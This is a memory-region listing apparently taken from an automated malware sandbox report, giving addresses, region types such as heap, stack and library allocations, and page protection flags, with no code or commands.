2B6B000
|
heap
|
page read and write
|
||
|
7690000
|
trusted library allocation
|
page read and write
|
||
|
2FDE000
|
heap
|
page read and write
|
||
|
4780000
|
heap
|
page read and write
|
||
|
47C2000
|
heap
|
page read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
47BC000
|
heap
|
page read and write
|
||
|
89AE000
|
trusted library allocation
|
page read and write
|
||
|
47CF000
|
heap
|
page read and write
|
||
|
47D0000
|
heap
|
page read and write
|
||
|
3217000
|
heap
|
page read and write
|
||
|
2A40000
|
heap
|
page read and write
|
||
|
47AA000
|
heap
|
page read and write
|
||
|
2B6C000
|
heap
|
page read and write
|
||
|
456000
|
system
|
page execute and read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
47AD000
|
heap
|
page read and write
|
||
|
4D10000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
47B1000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
47AD000
|
heap
|
page read and write
|
||
|
47C2000
|
heap
|
page read and write
|
||
|
70B5000
|
heap
|
page execute and read and write
|
||
|
47D3000
|
heap
|
page read and write
|
||
|
7695000
|
trusted library allocation
|
page read and write
|
||
|
506D000
|
trusted library allocation
|
page read and write
|
||
|
8760000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
85E0000
|
trusted library allocation
|
page read and write
|
||
|
82A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
CEC000
|
heap
|
page read and write
|
||
|
47B5000
|
heap
|
page read and write
|
||
|
47D3000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
85F0000
|
trusted library allocation
|
page read and write
|
||
|
31DE000
|
heap
|
page read and write
|
||
|
47D7000
|
heap
|
page read and write
|
||
|
7840000
|
trusted library allocation
|
page read and write
|
||
|
735B000
|
unclassified section
|
page execute and read and write
|
||
|
83C5000
|
heap
|
page read and write
|
||
|
47D3000
|
heap
|
page read and write
|
||
|
47D7000
|
heap
|
page read and write
|
||
|
C30000
|
heap
|
page read and write
|
||
|
82E0000
|
heap
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
B250000
|
heap
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
4F2F000
|
stack
|
page read and write
|
||
|
47D9000
|
heap
|
page read and write
|
||
|
2F6E000
|
stack
|
page read and write
|
||
|
47D6000
|
heap
|
page read and write
|
||
|
47BC000
|
heap
|
page read and write
|
||
|
47E9000
|
heap
|
page read and write
|
||
|
47DA000
|
heap
|
page read and write
|
||
|
47D7000
|
heap
|
page read and write
|
||
|
4D9F000
|
stack
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
47C4000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
7860000
|
trusted library allocation
|
page read and write
|
||
|
8C1E000
|
stack
|
page read and write
|
||
|
48FE000
|
stack
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
31F0000
|
heap
|
page read and write
|
||
|
27B7000
|
stack
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
82D0000
|
heap
|
page read and write
|
||
|
47BF000
|
heap
|
page read and write
|
||
|
47D6000
|
heap
|
page read and write
|
||
|
2B6C000
|
heap
|
page read and write
|
||
|
AA88000
|
trusted library allocation
|
page read and write
|
||
|
4CAE000
|
stack
|
page read and write
|
||
|
B87E000
|
unclassified section
|
page execute and read and write
|
||
|
47D6000
|
heap
|
page read and write
|
||
|
368C000
|
heap
|
page read and write
|
||
|
5F7C000
|
trusted library allocation
|
page read and write
|
||
|
41B000
|
system
|
page execute and read and write
|
||
|
4E00000
|
trusted library allocation
|
page execute and read and write
|
||
|
2DB0000
|
heap
|
page readonly
|
||
|
47D3000
|
heap
|
page read and write
|
||
|
2FDE000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
4F11000
|
trusted library allocation
|
page read and write
|
||
|
7500000
|
heap
|
page read and write
|
||
|
4F00000
|
heap
|
page read and write
|
||
|
76A0000
|
trusted library allocation
|
page read and write
|
||
|
7670000
|
trusted library allocation
|
page read and write
|
||
|
4DD0000
|
heap
|
page read and write
|
||
|
4784000
|
heap
|
page read and write
|
||
|
CC0000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
47CE000
|
heap
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
C7E000
|
stack
|
page read and write
|
||
|
2D3B000
|
stack
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
47CE000
|
heap
|
page read and write
|
||
|
47BC000
|
heap
|
page read and write
|
||
|
8AD1000
|
unclassified section
|
page execute read
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
6413000
|
trusted library allocation
|
page read and write
|
||
|
4D30000
|
heap
|
page read and write
|
||
|
BC66000
|
unclassified section
|
page execute and read and write
|
||
|
47AB000
|
heap
|
page read and write
|
||
|
47D9000
|
heap
|
page read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
B4DE000
|
heap
|
page read and write
|
||
|
47CE000
|
heap
|
page read and write
|
||
|
47D7000
|
heap
|
page read and write
|
||
|
9AC0000
|
trusted library allocation
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
47AB000
|
heap
|
page read and write
|
||
|
47BC000
|
heap
|
page read and write
|
||
|
47DF000
|
heap
|
page read and write
|
||
|
48D0000
|
trusted library allocation
|
page read and write
|
||
|
47C9000
|
heap
|
page read and write
|
||
|
9251000
|
trusted library allocation
|
page read and write
|
||
|
47D7000
|
heap
|
page read and write
|
||
|
47C1000
|
heap
|
page read and write
|
||
|
BC10000
|
unclassified section
|
page execute and read and write
|
||
|
772E000
|
stack
|
page read and write
|
||
|
47BC000
|
heap
|
page read and write
|
||
|
CBE000
|
stack
|
page read and write
|
||
|
47AB000
|
heap
|
page read and write
|
||
|
AA0D000
|
trusted library allocation
|
page read and write
|
||
|
47AB000
|
heap
|
page read and write
|
||
|
47D6000
|
heap
|
page read and write
|
||
|
47D3000
|
heap
|
page read and write
|
||
|
8287000
|
stack
|
page read and write
|
||
|
8425000
|
heap
|
page read and write
|
||
|
F50000
|
heap
|
page read and write
|
||
|
4EBE000
|
stack
|
page read and write
|
||
|
47B1000
|
heap
|
page read and write
|
||
|
47D9000
|
heap
|
page read and write
|
||
|
47BD000
|
heap
|
page read and write
|
||
|
48F0000
|
trusted library allocation
|
page read and write
|
||
|
4D18000
|
heap
|
page read and write
|
||
|
47BD000
|
heap
|
page read and write
|
||
|
368C000
|
heap
|
page read and write
|
||
|
FB0000
|
trusted library allocation
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
9B8000
|
stack
|
page read and write
|
||
|
323E000
|
stack
|
page read and write
|
||
|
47D0000
|
heap
|
page read and write
|
||
|
47CE000
|
heap
|
page read and write
|
||
|
7620000
|
trusted library allocation
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
3290000
|
heap
|
page read and write
|
||
|
9BD000
|
stack
|
page read and write
|
||
|
47AD000
|
heap
|
page read and write
|
||
|
47D3000
|
heap
|
page read and write
|
||
|
47C9000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
47B1000
|
heap
|
page read and write
|
||
|
4D60000
|
trusted library allocation
|
page read and write
|
||
|
7340000
|
unclassified section
|
page execute and read and write
|
||
|
8390000
|
trusted library allocation
|
page execute and read and write
|
||
|
3681000
|
heap
|
page read and write
|
||
|
47D6000
|
heap
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
78FB000
|
stack
|
page read and write
|
||
|
2D30000
|
heap
|
page read and write
|
||
|
7571000
|
heap
|
page read and write
|
||
|
2FD1000
|
heap
|
page read and write
|
||
|
8610000
|
trusted library allocation
|
page read and write
|
||
|
77F0000
|
trusted library allocation
|
page read and write
|
||
|
3682000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
474000
|
system
|
page execute and read and write
|
||
|
47C9000
|
heap
|
page read and write
|
||
|
48E0000
|
trusted library allocation
|
page read and write
|
||
|
47D7000
|
heap
|
page read and write
|
||
|
4DE8000
|
heap
|
page read and write
|
||
|
2FAF000
|
stack
|
page read and write
|
||
|
5030000
|
trusted library allocation
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
7890000
|
trusted library allocation
|
page read and write
|
||
|
323E000
|
stack
|
page read and write
|
||
|
CE0000
|
heap
|
page read and write
|
||
|
47B8000
|
heap
|
page read and write
|
||
|
47CE000
|
heap
|
page read and write
|
||
|
47AD000
|
heap
|
page read and write
|
||
|
47D7000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
2B6C000
|
heap
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
7650000
|
trusted library allocation
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
844D000
|
heap
|
page read and write
|
||
|
3683000
|
heap
|
page read and write
|
||
|
2B6C000
|
heap
|
page read and write
|
||
|
47BC000
|
heap
|
page read and write
|
||
|
47D3000
|
heap
|
page read and write
|
||
|
8640000
|
trusted library allocation
|
page read and write
|
||
|
47AA000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
31C0000
|
heap
|
page read and write
|
||
|
47D6000
|
heap
|
page read and write
|
||
|
4E10000
|
heap
|
page execute and read and write
|
||
|
32A6000
|
heap
|
page read and write
|
||
|
47D4000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
47AA000
|
heap
|
page read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
31E0000
|
heap
|
page read and write
|
||
|
4D18000
|
heap
|
page read and write
|
||
|
502F000
|
stack
|
page read and write
|
||
|
47CE000
|
heap
|
page read and write
|
||
|
2D46000
|
heap
|
page read and write
|
||
|
3564000
|
heap
|
page read and write
|
||
|
4C56000
|
heap
|
page read and write
|
||
|
5221000
|
heap
|
page read and write
|
||
|
47C8000
|
heap
|
page read and write
|
||
|
47AD000
|
heap
|
page read and write
|
||
|
368C000
|
heap
|
page read and write
|
||
|
2B60000
|
heap
|
page read and write
|
||
|
327B000
|
heap
|
page read and write
|
||
|
47D6000
|
heap
|
page read and write
|
||
|
47BA000
|
heap
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
30B0000
|
heap
|
page read and write
|
||
|
47C7000
|
heap
|
page read and write
|
||
|
45C000
|
system
|
page execute and read and write
|
||
|
47D7000
|
heap
|
page read and write
|
||
|
47C1000
|
heap
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
8631000
|
trusted library allocation
|
page read and write
|
||
|
30A0000
|
heap
|
page read and write
|
||
|
47B8000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
368C000
|
heap
|
page read and write
|
||
|
47D7000
|
heap
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
FB4000
|
trusted library allocation
|
page read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
8290000
|
heap
|
page read and write
|
||
|
3223000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
5030000
|
trusted library allocation
|
page read and write
|
||
|
76CE000
|
trusted library allocation
|
page read and write
|
||
|
3561000
|
heap
|
page read and write
|
||
|
8999000
|
trusted library allocation
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
48F5000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B20000
|
heap
|
page readonly
|
||
|
4DED000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
4DAE000
|
stack
|
page read and write
|
||
|
5A6D000
|
trusted library allocation
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
4EC0000
|
trusted library allocation
|
page read and write
|
||
|
47CE000
|
heap
|
page read and write
|
||
|
48D9000
|
trusted library allocation
|
page read and write
|
||
|
2CAF000
|
stack
|
page read and write
|
||
|
2B6C000
|
heap
|
page read and write
|
||
|
47AB000
|
heap
|
page read and write
|
||
|
47BC000
|
heap
|
page read and write
|
||
|
2CFC000
|
stack
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
48E7000
|
trusted library allocation
|
page execute and read and write
|
||
|
8458000
|
heap
|
page read and write
|
||
|
B40E000
|
stack
|
page read and write
|
||
|
4784000
|
heap
|
page read and write
|
||
|
31D0000
|
heap
|
page read and write
|
||
|
4E7C000
|
stack
|
page read and write
|
||
|
47D3000
|
heap
|
page read and write
|
||
|
A45B000
|
trusted library allocation
|
page read and write
|
||
|
47DF000
|
heap
|
page read and write
|
||
|
47D9000
|
heap
|
page read and write
|
||
|
66EE000
|
trusted library allocation
|
page read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
47DA000
|
heap
|
page read and write
|
||
|
32D2000
|
heap
|
page read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
2FD3000
|
heap
|
page read and write
|
||
|
EFE000
|
stack
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
47AC000
|
heap
|
page read and write
|
||
|
47CE000
|
heap
|
page read and write
|
||
|
838E000
|
stack
|
page read and write
|
||
|
7870000
|
trusted library allocation
|
page read and write
|
||
|
8C5C000
|
stack
|
page read and write
|
||
|
75E2000
|
heap
|
page read and write
|
||
|
47C7000
|
heap
|
page read and write
|
||
|
7566000
|
heap
|
page read and write
|
||
|
2B6C000
|
heap
|
page read and write
|
||
|
47BC000
|
heap
|
page read and write
|
||
|
2B30000
|
heap
|
page read and write
|
||
|
47CC000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
32C1000
|
heap
|
page read and write
|
||
|
5221000
|
heap
|
page read and write
|
||
|
47D4000
|
heap
|
page read and write
|
||
|
2CEE000
|
stack
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
33C0000
|
heap
|
page read and write
|
||
|
2FDE000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
4E20000
|
trusted library section
|
page read and write
|
||
|
47B1000
|
heap
|
page read and write
|
||
|
2DFC000
|
stack
|
page read and write
|
||
|
5030000
|
trusted library allocation
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
776E000
|
stack
|
page read and write
|
||
|
8700000
|
trusted library allocation
|
page read and write
|
||
|
8BDB000
|
stack
|
page read and write
|
||
|
86F0000
|
trusted library allocation
|
page read and write
|
||
|
47BC000
|
heap
|
page read and write
|
||
|
47C9000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
6C36000
|
trusted library allocation
|
page read and write
|
||
|
279C000
|
stack
|
page read and write
|
||
|
48EA000
|
trusted library allocation
|
page execute and read and write
|
||
|
47D7000
|
heap
|
page read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
47C2000
|
heap
|
page read and write
|
||
|
7680000
|
trusted library allocation
|
page read and write
|
||
|
47D7000
|
heap
|
page read and write
|
||
|
75E9000
|
heap
|
page read and write
|
||
|
4F79000
|
trusted library allocation
|
page read and write
|
||
|
7F780000
|
trusted library allocation
|
page execute and read and write
|
||
|
47BD000
|
heap
|
page read and write
|
||
|
47AB000
|
heap
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
AA80000
|
trusted library allocation
|
page read and write
|
||
|
7610000
|
heap
|
page execute and read and write
|
||
|
47AC000
|
heap
|
page read and write
|
||
|
4D31000
|
heap
|
page read and write
|
||
|
47D3000
|
heap
|
page read and write
|
||
|
60B9000
|
trusted library allocation
|
page read and write
|
||
|
2B6B000
|
heap
|
page read and write
|
||
|
F90000
|
trusted library section
|
page read and write
|
||
|
30BB000
|
heap
|
page read and write
|
||
|
47C9000
|
heap
|
page read and write
|
||
|
FA0000
|
trusted library allocation
|
page read and write
|
||
|
97C000
|
stack
|
page read and write
|
||
|
6A82000
|
trusted library allocation
|
page execute and read and write
|
||
|
7850000
|
trusted library allocation
|
page read and write
|
||
|
2BAD000
|
stack
|
page read and write
|
There are 551 hidden memdumps, click here to show them.